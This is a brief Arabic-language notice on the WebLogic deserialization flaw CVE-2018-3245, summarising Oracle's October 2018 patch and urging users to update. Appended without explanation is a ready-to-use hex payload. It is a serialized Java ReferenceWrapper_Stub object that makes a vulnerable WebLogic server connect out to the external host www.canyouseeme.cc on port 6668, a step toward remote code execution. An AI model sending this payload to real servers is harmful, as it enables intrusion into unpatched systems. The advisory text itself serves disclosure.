
CVE-2018-3245
CVE-2018-3245
في 16 أكتوبر بالتوقيت المحلي، وفجر 17 أكتوبر بتوقيت بكين، أصدرت Oracle رسميًا تحديث التصحيح الحرج CPU (Critical Patch Update) لشهر أكتوبر (الربع الثالث)، والذي تضمّن إصلاحًا لثغرة تنفيذ التعليمات البرمجية عن بُعد في WebLogic (CVE-2018-2893) التي لم يتم إصلاحها بالكامل في تصحيح CPU لشهر يوليو (الربع الثاني). رقم الثغرة التي تم إصلاحها حديثًا هو CVE-2018-3245.
قامت Oracle بالفعل بإصلاح هذه الثغرة في تحديث التصحيح الحرج (CPU) الحالي، ويُوصى بشدة للمستخدمين المتأثرين بالترقية والتحديث في أقرب وقت ممكن للحماية.
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html


Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078
